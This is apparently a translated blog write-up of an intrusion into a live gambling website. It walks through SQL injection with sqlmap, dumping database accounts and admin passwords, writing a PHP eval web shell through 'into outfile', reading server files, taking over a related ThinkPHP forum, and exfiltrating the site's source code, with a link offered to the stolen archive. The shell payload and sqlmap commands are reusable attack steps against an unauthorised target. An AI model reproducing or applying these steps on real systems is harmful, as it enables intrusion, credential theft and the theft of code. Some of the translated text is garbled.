Title: Everyone gets to kill him

0x00  Encounter a chess and card website

1. A simple packet capture analysis

2. Adding single quotes to the user name directly reports an error. After closing, it is normal. Inject one into SQL steadily.

3. After testing, no security devices were found, just go to SQLmap.

4. The process is not overdone, just get the following data

current-user: developer@%

select @@BASEDIR: '/usr/'

select USER(): '[email protected]'

select DATABASE(): 'edc'

select SYSTEM_USER(): '[email protected]'

select @@CHARACTER_SETS_DIR: '/usr/share/mysql/charsets/'

select @@CHARACTER_SET_CLIENT: 'utf8'

select @@DATADIR: '/var/lib/mysql/'

select @@CHARACTER_SET_SERVER: 'latin1'5. Through a wave of information collection, the current user permissions are very low, and there is very little useful information

6. Scan the target port and found that there are quite a lot of ports open.

7. Open port 80 without any page

Port 888 is the default homepage of apache. Get the absolute path /var/www/html/

Port 9090 is the gambling station management login address

Port 9091 is the gambling station member login address

8. After testing, there are no vulnerabilities available for these two pages.

0x01  Breakthrough Point

1. By scanning the directory, you will find an error page, get an injection point and get an info.php

2. Get the root permissions of the database

db_test Current database

[19:54:48] [INFO] resumed: 'root'@'localhost'

[19:54:48] [INFO] resumed: 'developer'@'localhost'

[19:54:48] [INFO] resumed: 'root'@'127.0.0.1'

[19:54:48] [INFO] resumed: 'syncopy'@'222.xxx.xxx.xxx'

[19:54:48] [INFO] resumed: 'mlh'@'localhost'

[19:54:48] [INFO] resumed: 'developer'@'%'

[19:54:48] [INFO] resumed: 'mlh'@'%'

[19:54:48] [INFO] resumed: 'edc'@'%'

[19:54:48] [INFO] resumed: '6hc_nav'@'%'

0x02  Try to write to shell

1. Writing to the shell through SQL statements has not been successful. Only when stacked queries can you execute non-queries SQL statements

sqlmap --sql-shell

select '?php eval($_POST['x']);' into outfile '/var/www/html/25u_ft/1.php'

2. Write in another way

--file-write '/localhost/shell.php' --file-dest '/var/www/html/25u_ft/test.php'3. It is impossible to write in at all. I found that there is no write permission, only read permission

--file-read '/var/www/html/25u_ft/info.php'4. It can be read normally, and tried to read the configuration file, and then I embarked on an error path

(1) I read several configuration files and I have no idea

(2) Go back and inject the administrator's password and try to get the shell from the background

-D '10fenft' -T 'g_user' -C 'g_name,g_password' --dump

(3) Log in to the background successfully

(4) A group of simple backgrounds without upload function

  0x03  getshell

1. If you have the conditions you should have, you just can’t get the shell, which is very uncomfortable.

2. Query this ip through various channels, and suddenly I found that the domain name was resolved here before.

3. Great, the domain name can be accessed normally, it is a forum

4. It turned out to be thinkphp, and the absolute path was also revealed

5. Repeat the previous write operation and it will be successful immediately, hahahaha

0x04  Package source code

1. Direct link to shell

2. The permissions are not high, but they do not affect my packaging source code at all.

0x05  Summary

I found that there are many sites of the same type

The source code is placed below

https://xzfile.aliyuncs.com/upload/affix/20210513165936-8aadc29a-b3c9-1.rar is reproduced from the original link: https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==mid=2247486232idx=1sn=301810a 7ba60add83cdcb99498de8125chksm=ce67a181f9102897905ffd677dafeb90087d996cd2e7965300094bd29cba8f68d69f675829bescene=21#wechat_redirecthttps://xz.aliyun.com/t/9567